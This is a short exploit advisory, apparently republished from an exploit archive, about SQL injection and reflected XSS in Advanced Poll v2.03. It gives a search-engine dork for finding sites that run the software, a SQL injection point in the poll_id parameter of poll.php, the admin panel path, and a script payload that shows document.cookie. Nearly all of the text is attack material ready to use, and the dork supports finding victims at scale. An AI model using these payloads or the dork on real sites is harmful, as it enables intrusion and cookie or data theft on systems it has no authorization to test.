id: 18469
date: 06/07/2012
title: Advanced Poll v2.03 SQL / XSS Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

Advanced Poll v2.03 Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.proxy2.de/
.:. Dork           : "Powered by Advanced Poll Version 2.03"
#######################################################################

===[ Exploit ]===


Sql Injection
==============

http://SITE/poll.php?poll_id=31[sql]

Admin Panel:

http://SITE/admin/

Reflected Xss
==============


http://SITE/poll.php?poll_id='"<script>alert(document.cookie)</script>

####################################################################### 



#  0day.today [2023-03-23]  #